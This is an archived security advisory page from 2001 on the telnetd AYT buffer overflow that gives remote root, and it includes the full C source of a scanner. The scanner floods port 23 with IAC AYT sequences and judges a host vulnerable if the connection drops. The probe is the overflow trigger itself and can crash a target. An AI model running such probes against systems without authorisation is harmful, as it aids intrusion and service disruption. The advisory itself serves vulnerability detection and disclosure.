SecurityTracker.com
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


 


Category:   Application (Generic)  >   Telnet Vendors:   [Multiple Authors/Vendors]
(A Scanner is Released) Re: Telnet Daemons May Give Remote Users Root Level Access Privileges
SecurityTracker Alert ID:  1002081
SecurityTracker URL:  http://securitytracker.com/id/1002081
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Jul 25 2001
Impact:   Execution of arbitrary code via network, Root access via network, User access via network


Description:   TESO reported that many BSD-derived Telnet daemons (servers) contain a vulnerability that may allow a remote user to obtain root level access on the server.

A user has posted a utility that will scan for vulnerable systems. The source code is contained in the Source Message. For information on the vulnerability, see the Message History.

Impact:   A remote user can execute arbitrary code on the server with the privileges of the telnet server, which is typically root level privileges.
Solution:   No solution was available at the time of this entry.
Cause:   Boundary error
Underlying OS:  Linux (Any), UNIX (Any)
Underlying OS Comments:  many Linux and Unix OSs are vulnerable, but not all - see the Alert text for more information

Message History:   This archive entry is a follow-up to the message listed below.
Jul 18 2001 Telnet Daemons May Give Remote Users Root Level Access Privileges



 Source Message Contents

Subject:  Telnetd AYT overflow scanner


--nVMJ2NtxeReIH9PS
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline


--nVMJ2NtxeReIH9PS
Content-Type: text/plain; charset=us-ascii
Content-Disposition: attachment; filename="SPtelnetAYT.c"

/*
 * Telnetd AYT overflow scanner, by Security Point(R)
 *              Bug found by scut of TESO Security
 *
 * Date: 25/07/01
 * Author: Security Point(R)
 * WWW: http://www.secpoint.com
 * Email: info@secpoint.com
 * 
 * This program checks for the AYT overflow realted to the
 * newly discovered telnetd vulnerabilities.
 *
 * Tested agianst:
 *	Vulnerable:
 *		netkit-telnet-0.10
 *              FreeBSD 4.2
 *	Not vulnerable:
 *		netkit-telnet-0.17
 *
 * Please keep us updated whith the os's that you check, and
 * report back to us on info@secpoint.com, weather the system 
 * is vulnerable or not. So we can construct a full list 
 * of vulnerable systems.
 *
 *
 * This source code is for educational purpose ONLY, 
 * Security Point(R) will not be responsible for any damages 
 * whatsoever that have a connection with this code. There are 
 * no warranties with regard to this information.
 *
 * Are your networks under attack at this moment?
 *
 * With Security Point(R) Scanner you can find and repair the
 * Vulnerabilities before the bad guys get in.
 *
 * Please see http://www.secpoint.com/solutions.php
 *
 */
 
#include <stdio.h>
#include <stdlib.h>
#include <netinet/in.h>
#include <netdb.h>
#include <string.h>
#include <signal.h>
#include <unistd.h>
#include <sys/socket.h>


struct in_addr addr;
struct sockaddr_in address;
struct hostent *host;
int sock;

char sendbuffer[5120*2];
char buffer[5120*2];
int i;
int timeout;

void handle_alarm(int signum) {
    alarm(0);
    timeout=1;
}

int main (int argc, char *argv[]) {
    printf("Telnetd AYT overflow scanner, by Security Point(R)\n");
    if (argc!=2) {
	printf("Usage: %s <host>\n", argv[0]);
	exit(EXIT_FAILURE);
    }
    printf("Host: %s\n", argv[1]);
    if ((host=gethostbyname(argv[1])) == NULL) {
	perror("gethostbyname");
	exit(0);
	exit(EXIT_FAILURE);
    }
    if (( sock = socket(AF_INET, SOCK_STREAM,0)) < 0) {
	perror("socket");
	exit(EXIT_FAILURE);
    }
    bcopy(host->h_addr, (char *)&address.sin_addr, host->h_length);
    address.sin_family=AF_INET;
    address.sin_port = htons(23);  // telnet
    if (connect(sock, (struct sockaddr*)&address, sizeof(address)) < 0) {
	perror("connect");
	exit(EXIT_FAILURE);
    }
    printf("Connected to remote host...\n",argv[1]);
    printf("Sending telnet options... stand by...\n");
    signal(SIGALRM,handle_alarm);

    bzero(sendbuffer,sizeof(sendbuffer));
    for (i=0;i!=(sizeof(sendbuffer)/2);i++) {
	sprintf(sendbuffer,"%s%c%c",sendbuffer,255,246); // 0xff 0xf6 - IAC AYT
    }
    alarm(60);
    read(sock, buffer, sizeof(buffer));
    alarm(0);

    write(sock, sendbuffer, strlen(sendbuffer));
    
    bzero(buffer,sizeof(buffer));

    alarm(60);
    if (read(sock, buffer, sizeof(buffer)) <=0) {
	printf("Telnetd on %s vulnerable\n",argv[1]);
	exit(EXIT_SUCCESS);
    }
    alarm(0);
    printf("Telnetd on %s not vulnerable\n",argv[1]);
    exit(EXIT_SUCCESS);
}

--nVMJ2NtxeReIH9PS--

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2019, SecurityGlobal.net LLC